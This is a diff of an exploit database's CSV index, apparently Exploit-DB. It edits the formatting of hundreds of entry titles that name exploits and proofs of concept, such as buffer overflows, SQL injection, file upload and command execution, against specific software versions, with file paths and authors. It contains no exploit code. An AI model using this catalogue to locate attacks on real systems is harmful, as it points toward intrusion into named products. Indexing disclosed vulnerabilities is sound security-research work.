18788,platforms/php/webapps/18788.txt,"php volunteer management 1.0.2 - Multiple Vulnerabilities",2012-04-26,G13,php,webapps,0 18785,platforms/linux/local/18785.txt,"Parallels PLESK 9.x - Insecure Permissions",2012-04-26,"Nicolas Krassas",linux,local,0 18787,platforms/php/webapps/18787.txt,"WordPress Zingiri Web Shop Plugin 2.4.0 - Multiple XSS Vulnerabilities",2012-04-26,"Mehmet Ince",php,webapps,0 @@ -16280,7 +16280,7 @@ id,file,description,date,author,platform,type,port 18814,platforms/php/webapps/18814.txt,"MyClientBase 0.12 - Multiple Vulnerabilities",2012-05-01,Vulnerability-Lab,php,webapps,0 18808,platforms/windows/local/18808.html,"SAMSUNG NET-i Viewer 1.37 - SEH Overwrite",2012-05-01,blake,windows,local,0 18809,platforms/php/webapps/18809.txt,"GENU CMS 2012.3 - Multiple SQL Injection",2012-05-01,Vulnerability-Lab,php,webapps,0 -18812,platforms/windows/remote/18812.rb,"McAfee Virtual Technician MVTControl 6.3.0.1911 GetObject",2012-05-01,Metasploit,windows,remote,0 +18812,platforms/windows/remote/18812.rb,"McAfee Virtual Technician MVTControl 6.3.0.1911 - GetObject",2012-05-01,Metasploit,windows,remote,0 18813,platforms/php/webapps/18813.txt,"opencart 1.5.2.1 - Multiple Vulnerabilities",2012-05-01,waraxe,php,webapps,0 18815,platforms/php/webapps/18815.txt,"STRATO Newsletter Manager Directory Traversal",2012-05-01,"Zero X",php,webapps,0 18816,platforms/windows/dos/18816.py,"LAN Messenger 1.2.28 - Denial of Service",2012-05-01,"Julien Ahrens",windows,dos,0 @@ -16291,7 +16291,7 @@ id,file,description,date,author,platform,type,port 18823,platforms/windows/local/18823.txt,"Symantec pcAnywhere - Insecure File Permissions Local Privilege Escalation",2012-05-02,"Edward Torkington",windows,local,0 18824,platforms/cgi/webapps/18824.txt,"Websense Triton - Multiple Vulnerabilities",2012-05-02,"Ben Williams",cgi,webapps,0 18822,platforms/php/webapps/18822.txt,"php-decoda - Cross-Site Scripting In Video Tag",2012-05-02,"RedTeam Pentesting",php,webapps,0 -18825,platforms/windows/remote/18825.rb,"VLC Mms Stream Handling Buffer Overflow",2012-05-03,Metasploit,windows,remote,0 +18825,platforms/windows/remote/18825.rb,"VLC - Mms Stream Handling Buffer Overflow",2012-05-03,Metasploit,windows,remote,0 18826,platforms/windows/local/18826.py,"AnvSoft Any Video Converter 4.3.6 - Stack Overflow Exploit",2012-05-03,cikumel,windows,local,0 18827,platforms/php/webapps/18827.txt,"Baby Gekko CMS 1.1.5c - Multiple Stored XSS Vulnerabilities",2012-05-03,LiquidWorm,php,webapps,0 18828,platforms/php/webapps/18828.txt,"PluXml 5.1.5 - Local File Inclusion",2012-05-03,"High-Tech Bridge SA",php,webapps,0 @@ -16313,14 +16313,14 @@ id,file,description,date,author,platform,type,port 18847,platforms/windows/remote/18847.rb,"Firefox 7 / 8<= 8.0.1 - nsSVGValue Out-of-Bounds Access",2012-05-09,Metasploit,windows,remote,0 18850,platforms/php/webapps/18850.txt,"X7 Chat 2.0.5.1 - CSRF Add Admin Exploit",2012-05-09,DennSpec,php,webapps,0 18851,platforms/windows/dos/18851.py,"Guitar Pro 6.1.1 r10791 - (.gpx) Crash PoC",2012-05-09,condis,windows,dos,0 -18852,platforms/windows/dos/18852.txt,"DecisionTools SharpGrid ActiveX Control RCE",2012-05-09,"Francis Provencher",windows,dos,0 +18852,platforms/windows/dos/18852.txt,"DecisionTools SharpGrid - ActiveX Control RCE",2012-05-09,"Francis Provencher",windows,dos,0 18853,platforms/windows/dos/18853.txt,"SAP Netweaver Dispatcher - Multiple Vulnerabilities",2012-05-09,"Core Security",windows,dos,0 18865,platforms/php/webapps/18865.rb,"WikkaWiki 1.3.2 - Spam Logging PHP Injection",2012-05-12,Metasploit,php,webapps,0 18855,platforms/linux/dos/18855.txt,"Asterisk 'ast_parse_digest()' Stack Buffer Overflow",2012-03-15,"Russell Bryant",linux,dos,0 18857,platforms/php/webapps/18857.txt,"Kerio WinRoute Firewall Web Server < 6 Source Code Disclosure",2012-05-10,"Andrey Komarov",php,webapps,0 18858,platforms/php/webapps/18858.txt,"elearning server 4g - Multiple Vulnerabilities",2012-05-10,"Andrey Komarov",php,webapps,0 18866,platforms/windows/remote/18866.rb,"Distinct TFTP 3.01 - Writable Directory Traversal Execution",2012-05-12,Metasploit,windows,remote,0 -18869,platforms/windows/local/18869.pl,"AnvSoft Any Video Converter 4.3.6 Unicode Buffer Overflow",2012-05-12,h1ch4m,windows,local,0 +18869,platforms/windows/local/18869.pl,"AnvSoft Any Video Converter 4.3.6 - Unicode Buffer Overflow",2012-05-12,h1ch4m,windows,local,0 18868,platforms/php/webapps/18868.txt,"Sockso 1.51 - Persistent XSS",2012-05-12,"Ciaran McNally",php,webapps,0 18870,platforms/windows/remote/18870.rb,"Firefox 8/9 - AttributeChildRemoved() Use-After-Free",2012-05-13,Metasploit,windows,remote,0 18872,platforms/php/webapps/18872.txt,"Proman Xpress 5.0.1 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0 @@ -16328,7 +16328,7 @@ id,file,description,date,author,platform,type,port 18874,platforms/php/webapps/18874.txt,"Free Realty 3.1-0.6 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0 18875,platforms/php/webapps/18875.txt,"Galette - (picture.php) SQL Injection",2012-05-13,sbz,php,webapps,0 18879,platforms/windows/dos/18879.rb,"Multimedia Builder 4.9.8 - (.mef) DoS",2012-05-15,"Ahmed Elhady Mohamed",windows,dos,0 -18896,platforms/multiple/remote/18896.rb,"Squiggle 1.7 SVG Browser Java Code Execution",2012-05-19,Metasploit,multiple,remote,0 +18896,platforms/multiple/remote/18896.rb,"Squiggle 1.7 - SVG Browser Java Code Execution",2012-05-19,Metasploit,multiple,remote,0 18877,platforms/multiple/dos/18877.txt,"FlexNet License Server Manager Stack Overflow In lmgrd",2012-05-14,"Luigi Auriemma",multiple,dos,0 18878,platforms/windows/dos/18878.txt,"Pro-face Pro-Server EX WinGP PC Runtime - Multiple Vulnerabilities",2012-05-14,"Luigi Auriemma",windows,dos,0 18881,platforms/java/webapps/18881.txt,"Liferay Portal 6.1 - 6.0.x Privilege Escalation",2012-05-13,"Jelmer Kuperus",java,webapps,0 @@ -16346,7 +16346,7 @@ id,file,description,date,author,platform,type,port 18897,platforms/windows/remote/18897.rb,"Oracle Weblogic Apache Connector POST Request Buffer Overflow",2012-05-19,Metasploit,windows,remote,0 18899,platforms/php/webapps/18899.txt,"PHP Address Book 7.0.0 - Multiple Vulnerabilities",2012-05-19,"Stefan Schurtz",php,webapps,0 18900,platforms/php/webapps/18900.txt,"FreeNAC 3.02 - SQL Injection / XSS",2012-05-19,blake,php,webapps,0 -18901,platforms/hardware/remote/18901.rb,"HP StorageWorks P4000 Virtual SAN Appliance Command Execution",2012-05-21,Metasploit,hardware,remote,0 +18901,platforms/hardware/remote/18901.rb,"HP StorageWorks P4000 - Virtual SAN Appliance Command Execution",2012-05-21,Metasploit,hardware,remote,0 18902,platforms/windows/dos/18902.rb,"Real-DRAW PRO 5.2.4 Import File Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0 18903,platforms/windows/dos/18903.rb,"DVD-Lab Studio 1.25 DAL File Open Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0 18910,platforms/php/dos/18910.php,"PHP 5.4.3 - (com_event_sink) Denial of Service",2012-05-21,condis,php,dos,0 @@ -16367,11 +16367,11 @@ id,file,description,date,author,platform,type,port 18923,platforms/windows/local/18923.rb,"OpenOffice OLE Importer DocumentSummaryInformation Stream Handling Overflow",2012-05-25,Metasploit,windows,local,0 18926,platforms/windows/dos/18926.php,"bsnes 0.87 - Local Denial of Service",2012-05-25,"Yakir Wizman",windows,dos,0 18927,platforms/php/webapps/18927.txt,"socialengine 4.2.2 - Multiple Vulnerabilities",2012-05-25,i4k,php,webapps,0 -18929,platforms/windows/remote/18929.rb,"RabidHamster R4 Log Entry sprintf() Buffer Overflow",2012-05-25,Metasploit,windows,remote,0 +18929,platforms/windows/remote/18929.rb,"RabidHamster R4 - Log Entry sprintf() Buffer Overflow",2012-05-25,Metasploit,windows,remote,0 18950,platforms/php/webapps/18950.txt,"NewsAdd 1.0 - Multiple SQL Injection",2012-05-30,WhiteCollarGroup,php,webapps,0 18931,platforms/ios/dos/18931.rb,"iOS 5.1.1 - Safari Browser - JS match() & search() Crash PoC",2012-05-25,"Alberto Ortega",ios,dos,0 18933,platforms/windows/remote/18933.rb,"quickshare file share 1.2.1 - Directory Traversal (2)",2012-05-27,Metasploit,windows,remote,0 -18934,platforms/php/webapps/18934.rb,"WeBid converter.php Remote PHP Code Injection",2012-05-27,Metasploit,php,webapps,0 +18934,platforms/php/webapps/18934.rb,"WeBid - converter.php Remote PHP Code Injection",2012-05-27,Metasploit,php,webapps,0 18935,platforms/php/webapps/18935.txt,"b2ePms 1.0 - Multiple SQLi Vulnerabilities",2012-05-27,loneferret,php,webapps,0 18942,platforms/linux/remote/18942.rb,"Symantec Web Gateway 5.0.2.8 - Command Execution",2012-05-28,Metasploit,linux,remote,0 18937,platforms/php/webapps/18937.txt,"PBBoard 2.1.4 - Local File Inclusion",2012-05-28,n4ss1m,php,webapps,0 @@ -16410,10 +16410,10 @@ id,file,description,date,author,platform,type,port 18989,platforms/php/webapps/18989.php,"WordPress Google Maps via Store Locator Plugin 2.7.1 < 3.0.1 - Multiple Vulnerabilities",2012-06-05,"Sammy FORGIT",php,webapps,0 18990,platforms/php/webapps/18990.php,"WordPress HTML5 AV Manager Plugin 0.2.7 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 18991,platforms/php/webapps/18991.php,"WordPress Foxypress Plugin 0.4.1.1 < 0.4.2.1 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 -19027,platforms/windows/remote/19027.rb,"Samsung NET-i viewer Multiple ActiveX BackupToAvi() Remote Overflow",2012-06-08,Metasploit,windows,remote,0 +19027,platforms/windows/remote/19027.rb,"Samsung NET-i viewer - Multiple ActiveX BackupToAvi() Remote Overflow",2012-06-08,Metasploit,windows,remote,0 18993,platforms/php/webapps/18993.php,"WordPress Asset Manager Plugin 0.2 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 18994,platforms/php/webapps/18994.php,"WordPress Font Uploader Plugin 1.2.4 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 -19026,platforms/windows/remote/19026.rb,"Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow",2012-06-08,Metasploit,windows,remote,0 +19026,platforms/windows/remote/19026.rb,"Microsoft IIS - MDAC msadcs.dll RDS DataStub Content-Type Overflow",2012-06-08,Metasploit,windows,remote,0 18997,platforms/php/webapps/18997.php,"WordPress MM Forms Community Plugin 2.2.6 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 18998,platforms/php/webapps/18998.php,"WordPress Gallery Plugin 3.06 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 18999,platforms/php/webapps/18999.php,"SN News 1.2 - (visualiza.php) SQL Injection",2012-06-06,WhiteCollarGroup,php,webapps,0 @@ -16459,7 +16459,7 @@ id,file,description,date,author,platform,type,port 19050,platforms/php/webapps/19050.txt,"WordPress wp-gpx-map 1.1.21 Plugin - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 19051,platforms/php/webapps/19051.txt,"ClanSuite 2.9 - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 19052,platforms/php/webapps/19052.txt,"WordPress User Meta 1.1.1 Plugin - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 -19053,platforms/php/webapps/19053.txt,"WordPress Top Quark Architecture 2.10 Plugin- Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 +19053,platforms/php/webapps/19053.txt,"WordPress Top Quark Architecture 2.10 Plugin- - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 19054,platforms/php/webapps/19054.txt,"WordPress SfBrowser 1.4.5 Plugin - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 19055,platforms/php/webapps/19055.txt,"WordPress Pica Photo Gallery 1.0 - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 19056,platforms/php/webapps/19056.txt,"WordPress Mac Photo Gallery 2.7 Plugin - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 @@ -16470,7 +16470,7 @@ id,file,description,date,author,platform,type,port 19066,platforms/irix/local/19066.txt,"SGI IRIX 5.3/6.2 & SGI license_oeo 1.0 LicenseManager NETLS_LICENSE_FILE",1996-04-05,"Arthur Hagen",irix,local,0 19067,platforms/irix/local/19067.txt,"SGI IRIX 6.4 & SGI license_oeo 3.0/3.1/3.1.1 LicenseManager LICENSEMGR_FILE_ROOT",1996-11-22,"Yuri Volobuev",irix,local,0 19064,platforms/hardware/dos/19064.txt,"F5 BIG-IP - Remote Root Authentication Bypass (1)",2012-06-11,"Florent Daigniere",hardware,dos,0 -19065,platforms/php/webapps/19065.rb,"Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection",2012-06-12,Metasploit,php,webapps,0 +19065,platforms/php/webapps/19065.rb,"Symantec Web Gateway 5.0.2.8 - ipchange.php Command Injection",2012-06-12,Metasploit,php,webapps,0 19068,platforms/unix/local/19068.txt,"Digital UNIX 4.0/4.0 B/4.0 D SUID/SGID Core File",1998-04-06,"ru5ty and SoReN",unix,local,0 19069,platforms/linux/remote/19069.txt,"Qualcomm Eudora Internet Mail Server 1.2 - Buffer Overflow",1998-04-14,"Netstat Webmaster",linux,remote,0 19070,platforms/linux/local/19070.txt,"Slackware Linux 3.4 - liloconfig-color temporary file",1998-04-06,neonhaze,linux,local,0 @@ -16548,7 +16548,7 @@ id,file,description,date,author,platform,type,port 19147,platforms/windows/remote/19147.txt,"NT IIS4 - Remote Web-Based Administration",1999-01-14,Mnemonix,windows,remote,0 19149,platforms/windows/remote/19149.c,"NT IIS4 Log Avoidance",1999-01-22,Mnemonix,windows,remote,0 19152,platforms/windows/remote/19152.txt,"Microsoft IIS 5.0 IISAPI Extension Enumerate Root Web Server Directory",1999-01-26,Mnemonix,windows,remote,0 -19387,platforms/windows/remote/19387.rb,"Apple iTunes 10 Extended M3U Stack Buffer Overflow",2012-06-25,Metasploit,windows,remote,0 +19387,platforms/windows/remote/19387.rb,"Apple iTunes 10 - Extended M3U Stack Buffer Overflow",2012-06-25,Metasploit,windows,remote,0 19156,platforms/windows/remote/19156.txt,"Microsoft Internet Explorer 5.0.1 - Invalid Byte Cross-Frame Access",1999-01-28,"Georgi Guninski",windows,remote,0 19413,platforms/windows/dos/19413.c,"Windows 95/98_Windows NT Enterprise Server 4.0 SP5_Windows NT Terminal Server 4.0 SP4_Windows NT Workstation 4.0 SP5 - (1)",1999-07-03,Coolio,windows,dos,0 19391,platforms/windows/dos/19391.py,"Slimpdf Reader 1.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 @@ -16565,7 +16565,7 @@ id,file,description,date,author,platform,type,port 19172,platforms/unix/local/19172.c,"BSD/OS 2.1_DG/UX 7.0_Debian Linux 1.3_HP-UX 10.34_IBM AIX 4.2_SGI IRIX 6.4_Solaris 2.5.1 - xlock (1)",1997-04-26,cesaro,unix,local,0 19173,platforms/unix/local/19173.c,"BSD/OS 2.1_DG/UX 7.0_Debian Linux 1.3_HP-UX 10.34_IBM AIX 4.2_SGI IRIX 6.4_Solaris 2.5.1 - xlock (2)",1997-04-26,BeastMaster,unix,local,0 19174,platforms/php/webapps/19174.py,"Useresponse 1.0.2 - Privilege Escalation / RCE Exploit",2012-06-15,mr_me,php,webapps,0 -19175,platforms/windows/local/19175.rb,"Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow",2012-06-17,Metasploit,windows,local,0 +19175,platforms/windows/local/19175.rb,"Lattice Semiconductor PAC-Designer 6.21 - Symbol Value Buffer Overflow",2012-06-17,Metasploit,windows,local,0 19176,platforms/windows/local/19176.rb,"TFM MMPlayer - (.m3u/.ppl) Buffer Overflow",2012-06-15,Metasploit,windows,local,0 19177,platforms/windows/remote/19177.rb,"ComSndFTP 1.3.7 Beta - USER Format String (Write4)",2012-06-15,Metasploit,windows,remote,0 19178,platforms/php/webapps/19178.txt,"webo site speedup 1.6.1 - Multiple Vulnerabilities",2012-06-16,dun,php,webapps,0 @@ -16582,7 +16582,7 @@ id,file,description,date,author,platform,type,port 19189,platforms/php/webapps/19189.txt,"iScripts EasyCreate CMS 2.0 - Multiple Vulnerabilities",2012-06-16,Vulnerability-Lab,php,webapps,0 19389,platforms/windows/dos/19389.txt,"Kingview Touchview 6.53 - Multiple Heap Overflow Vulnerabilities",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 19192,platforms/windows/local/19192.txt,"Hancom Office 2007 Reboot.ini Clear-Text Passwords",1999-02-09,"Russ Cooper",windows,local,0 -19193,platforms/multiple/remote/19193.txt,"Allaire Forums 2.0.4 Getfile",1999-02-11,"Cameron Childress",multiple,remote,0 +19193,platforms/multiple/remote/19193.txt,"Allaire Forums 2.0.4 - Getfile",1999-02-11,"Cameron Childress",multiple,remote,0 19194,platforms/multiple/remote/19194.txt,"Microsoft IIS 3.0/4.0 Using ASP And FSO To Read Server Files",1999-02-11,"Gary Geisbert",multiple,remote,0 19195,platforms/windows/local/19195.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 LSA Secrets",1997-07-16,"Paul Ashton",windows,local,0 19196,platforms/windows/local/19196.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - RAS Dial-up Networking 'Save Password'",1998-03-19,"Martin Dolphin",windows,local,0 @@ -16679,7 +16679,7 @@ id,file,description,date,author,platform,type,port 19287,platforms/aix/local/19287.c,"IBM AIX 4.3 infod",1998-11-21,"Repent Security Inc",aix,local,0 19288,platforms/windows/remote/19288.py,"HP Data Protector Client - EXEC_CMD Remote Code Execution",2012-06-19,"Ben Turner",windows,remote,0 19289,platforms/windows/dos/19289.txt,"Samsung AllShare 2.1.1.0 - NULL Pointer Deference",2012-06-19,"Luigi Auriemma",windows,dos,0 -19290,platforms/multiple/dos/19290.txt,"Airlock WAF 4.2.4 Overlong UTF-8 Sequence Bypass",2012-06-19,"SEC Consult",multiple,dos,0 +19290,platforms/multiple/dos/19290.txt,"Airlock WAF 4.2.4 - Overlong UTF-8 Sequence Bypass",2012-06-19,"SEC Consult",multiple,dos,0 19291,platforms/windows/remote/19291.rb,"EZHomeTech EzServer 6.4.017 - Stack Buffer Overflow",2012-06-19,Metasploit,windows,remote,0 19292,platforms/php/webapps/19292.txt,"iBoutique eCommerce 4.0 - Multiple Web Vulnerabilites",2012-06-19,Vulnerability-Lab,php,webapps,0 19293,platforms/windows/local/19293.py,"Sysax 5.62 - Admin Interface Local Buffer Overflow",2012-06-20,"Craig Freyman",windows,local,0 @@ -16757,8 +16757,8 @@ id,file,description,date,author,platform,type,port 19361,platforms/windows/remote/19361.txt,"Microsoft IIS 3.0/4.0 Double Byte Code Page",1999-06-24,Microsoft,windows,remote,0 19362,platforms/sco/local/19362.c,"SCO Open Server 5.0.5 - XBase Buffer Overflow",1999-06-14,doble,sco,local,0 19363,platforms/multiple/remote/19363.txt,"Netscape FastTrack Server 3.0.1 Fasttrack Root Directory Listing",1999-06-07,"Jesús López de Aguileta",multiple,remote,0 -19364,platforms/netware/local/19364.txt,"Novell Netware 4.1/4.11 SP5B Remote.NLM Weak Encryption",1999-04-09,dreamer,netware,local,0 -19365,platforms/netware/remote/19365.txt,"Novell Netware 4.1/4.11 SP5B NDS Default Rights",1999-04-09,"Simple Nomad",netware,remote,0 +19364,platforms/netware/local/19364.txt,"Novell Netware 4.1/4.11 - SP5B Remote.NLM Weak Encryption",1999-04-09,dreamer,netware,local,0 +19365,platforms/netware/remote/19365.txt,"Novell Netware 4.1/4.11 - SP5B NDS Default Rights",1999-04-09,"Simple Nomad",netware,remote,0 19384,platforms/linux/local/19384.c,"Debian Linux 2.1 - Print Queue Control",1999-07-02,"Chris Leishman",linux,local,0 19368,platforms/multiple/dos/19368.sh,"Lotus Domino 4.6.1/4.6.4 Notes SMTPA MTA Mail Relay",1999-06-15,"Robert Lister",multiple,dos,0 19369,platforms/windows/remote/19369.rb,"Adobe Flash Player - Object Type Confusion",2012-06-25,Metasploit,windows,remote,0 @@ -16778,7 +16778,7 @@ id,file,description,date,author,platform,type,port 19394,platforms/asp/webapps/19394.txt,"Parodia 6.8 employer-profile.asp SQL Injection",2012-06-25,"Carlos Mario Penagos Hollmann",asp,webapps,0 19398,platforms/php/webapps/19398.txt,"WordPress Fancy Gallery Plugin 1.2.4 - Arbitrary File Upload",2012-06-25,"Sammy FORGIT",php,webapps,0 19408,platforms/php/webapps/19408.txt,"Zend Framework Local File Disclosure",2012-06-27,"SEC Consult",php,webapps,0 -19403,platforms/php/webapps/19403.rb,"SugarCRM 6.3.1 unserialize() PHP Code Execution",2012-06-26,Metasploit,php,webapps,0 +19403,platforms/php/webapps/19403.rb,"SugarCRM 6.3.1 - unserialize() PHP Code Execution",2012-06-26,Metasploit,php,webapps,0 29039,platforms/windows/dos/29039.py,"Kerio MailServer 5.x/6.x - Remote LDAP Denial of Service",2006-11-15,"Evgeny Legerov",windows,dos,0 19409,platforms/windows/dos/19409.txt,"Sielco Sistemi Winlog 2.07.16 - Multiple Vulnerabilities",2012-06-27,"Luigi Auriemma",windows,dos,0 19414,platforms/windows/dos/19414.c,"Windows 95/98_Windows NT Enterprise Server 4.0 SP5_Windows NT Terminal Server 4.0 SP4_Windows NT Workstation 4.0 SP5 - (2)",1999-07-03,klepto,windows,dos,0 @@ -16797,10 +16797,10 @@ id,file,description,date,author,platform,type,port 19427,platforms/osx/local/19427.txt,"Apple At Ease 5.0",1999-05-13,"Tim Conrad",osx,local,0 19428,platforms/linux/local/19428.c,"Samba Pre-2.0.5",1999-07-21,"Gerald Britton",linux,local,0 19429,platforms/linux/local/19429.sh,"Rational Software ClearCase for Unix 3.2 ClearCase SUID",1999-05-02,Mudge,linux,local,0 -19430,platforms/multiple/local/19430.txt,"GNU groff 1.11 a_HP-UX 10.0/11.0_SGI IRIX 6.5.3 Malicious Manpage Vulnerabilities",1999-07-25,"Pawel Wilk",multiple,local,0 +19430,platforms/multiple/local/19430.txt,"GNU groff 1.11 a_HP-UX 10.0/11.0_SGI IRIX 6.5.3 - Malicious Manpage Vulnerabilities",1999-07-25,"Pawel Wilk",multiple,local,0 19431,platforms/php/webapps/19431.txt,"webERP 4.08.1 - Local/Remote File Inclusion",2012-06-28,dun,php,webapps,0 -19432,platforms/jsp/webapps/19432.rb,"Openfire 3.6.0a Admin Console Authentication Bypass",2012-06-28,Metasploit,jsp,webapps,0 -19433,platforms/windows/local/19433.rb,"Apple QuickTime TeXML Stack Buffer Overflow",2012-06-28,Metasploit,windows,local,0 +19432,platforms/jsp/webapps/19432.rb,"Openfire 3.6.0a - Admin Console Authentication Bypass",2012-06-28,Metasploit,jsp,webapps,0 +19433,platforms/windows/local/19433.rb,"Apple QuickTime - TeXML Stack Buffer Overflow",2012-06-28,Metasploit,windows,local,0 19434,platforms/osx/local/19434.txt,"Quinn - 'the Eskimo' and Peter N. Lewis Internet Config 1.0/2.0 Weak Password Encryption",1999-07-28,"Dawid adix Adamski",osx,local,0 19435,platforms/windows/remote/19435.html,"Microsoft JET 3.5/3.51/4.0 VBA Shell",1999-07-29,BrootForce,windows,remote,0 19436,platforms/hardware/dos/19436.txt,"Check Point Software Firewall-1 3.0/1 4.0 Table Saturation Denial of Service",1999-07-29,"Lance Spitzner",hardware,dos,0 @@ -16882,7 +16882,7 @@ id,file,description,date,author,platform,type,port 19513,platforms/hardware/dos/19513.txt,"Eicon Networks DIVA LAN ISDN Modem 1.0 Release 2.5/1.0/2.0 - DoS",1999-09-27,"Bjorn Stickler",hardware,dos,0 19514,platforms/windows/remote/19514.txt,"Adobe Acrobat ActiveX Control 1.3.188 - ActiveX Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4.0 for Windows 95/Windows NT 4 - Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 -19516,platforms/windows/local/19516.txt,"Microsoft MSN Messenger Service 1.0 Setup BBS ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,local,0 +19516,platforms/windows/local/19516.txt,"Microsoft MSN Messenger Service 1.0 Setup BBS - ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,local,0 19517,platforms/linux/local/19517.pl,"Emesene 2.12.5 - Password Disclosure",2012-07-01,"Daniel Godoy",linux,local,0 19793,platforms/php/webapps/19793.txt,"Magento eCommerce Local File Disclosure",2012-07-13,"SEC Consult",php,webapps,0 19519,platforms/windows/local/19519.rb,"Irfanview JPEG2000 4.3.2.0 - jp2 Stack Buffer Overflow",2012-07-01,Metasploit,windows,local,0 @@ -16981,12 +16981,12 @@ id,file,description,date,author,platform,type,port 19610,platforms/windows/local/19610.c,"Irfan Skiljan IrfanView32 3.0.7 Image File Buffer Overflow",1999-11-09,UNYUN,windows,local,0 19611,platforms/windows/remote/19611.txt,"TransSoft Broker FTP Server 3.0 x/4.0 - User Name Buffer Overflow",1999-11-08,"Ussr Labs",windows,remote,0 19612,platforms/windows/remote/19612.pl,"Trend Micro InterScan VirusWall 3.2.3/3.3 Long HELO Buffer Overflow (1)",1999-11-07,"Alain Thivillon & Stephane Aubert",windows,remote,0 -19613,platforms/windows/remote/19613.rb,"Poison Ivy 2.3.2 C&C Server Buffer Overflow",2012-07-06,Metasploit,windows,remote,3460 +19613,platforms/windows/remote/19613.rb,"Poison Ivy 2.3.2 - C&C Server Buffer Overflow",2012-07-06,Metasploit,windows,remote,3460 19614,platforms/windows/remote/19614.asm,"Trend Micro InterScan VirusWall 3.2.3/3.3 Long HELO Buffer Overflow (2)",1999-11-07,"dark spyrit",windows,remote,0 19615,platforms/unix/dos/19615.c,"ISC BIND 8.2.2 / IRIX 6.5.17 / Solaris 7.0 - NXT Overflow / Denial of Service",1999-11-10,"ADM Crew",unix,dos,0 19616,platforms/windows/dos/19616.c,"Ipswitch IMail 5.0.5/5.0.6/5.0.7 - POP3 Denial of Service (Possible Buffer Overflow)",1999-11-08,Interrupt,windows,dos,0 19617,platforms/windows/remote/19617.txt,"NetcPlus SmartServer3 3.5.1 POP Buffer Overflow",1999-11-11,"Ussr Labs",windows,remote,0 -19618,platforms/windows/remote/19618.txt,"Microsoft Internet Explorer 5.0 Media Player ActiveX Error Message",1999-11-14,"Georgi Guninski",windows,remote,0 +19618,platforms/windows/remote/19618.txt,"Microsoft Internet Explorer 5.0 Media Player - ActiveX Error Message",1999-11-14,"Georgi Guninski",windows,remote,0 19619,platforms/windows/dos/19619.txt,"QPC Software QVT Term 4.3/QVT/Net 4.3 Suite FTP Server DoS",1999-11-10,"Ussr Labs",windows,dos,0 19620,platforms/unix/remote/19620.txt,"Matt Wright FormHandler.cgi 2.0 Reply Attachment",1999-11-16,m4rcyS,unix,remote,0 19621,platforms/windows/remote/19621.c,"Admiral Systems EmailClub 1.0.0.5 - Buffer Overflow",1999-11-15,UNYUN,windows,remote,0 @@ -16998,8 +16998,8 @@ id,file,description,date,author,platform,type,port 19628,platforms/php/webapps/19628.txt,"Event Script PHP 1.1 CMS - Multiple Vulnerabilities",2012-07-06,Vulnerability-Lab,php,webapps,0 19629,platforms/php/webapps/19629.txt,"Webmatic 3.1.1 - Blind SQL Injection",2012-07-06,"High-Tech Bridge SA",php,webapps,0 19630,platforms/php/webapps/19630.rb,"Tiki Wiki 8.3 - unserialize() PHP Code Execution",2012-07-09,Metasploit,php,webapps,0 -19631,platforms/php/webapps/19631.rb,"Basilic 1.5.14 diff.php Arbitrary Command Execution",2012-07-09,Metasploit,php,webapps,0 -19632,platforms/hardware/remote/19632.txt,"Tektronix Phaser Network Printer 740/750/750DP/840/930 PhaserLink Webserver",1999-11-17,"Dennis W. Mattison",hardware,remote,0 +19631,platforms/php/webapps/19631.rb,"Basilic 1.5.14 - diff.php Arbitrary Command Execution",2012-07-09,Metasploit,php,webapps,0 +19632,platforms/hardware/remote/19632.txt,"Tektronix Phaser Network Printer 740/750/750DP/840/930 PhaserLink Webserver - Retrieve Administrator Password",1999-11-17,"Dennis W. Mattison",hardware,remote,0 19633,platforms/windows/local/19633.txt,"Windows 95/98/Enterprise Server 4/NT Server 4/Terminal Server 4/Workstation 4 Riched Buffer Overflow",1999-11-17,"Pauli Ojanpera",windows,local,0 19634,platforms/linux/remote/19634.c,"ETL Delegate 5.9.x / 6.0.x - Buffer Overflow",1999-11-13,scut,linux,remote,0 19635,platforms/solaris/dos/19635.c,"Sun Solaris 7.0 - rpc.ttdbserver Denial of Service",1999-11-19,"Elias Levy",solaris,dos,0 @@ -17038,7 +17038,7 @@ id,file,description,date,author,platform,type,port 19668,platforms/solaris/remote/19668.c,"Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow (1)",1999-06-24,"Cheez Whiz",solaris,remote,0 19669,platforms/solaris/remote/19669.c,"Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow (2)",1999-06-24,"Cheez Whiz",solaris,remote,0 19670,platforms/solaris/remote/19670.c,"Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow (3)",2000-11-10,"nikolai abromov",solaris,remote,0 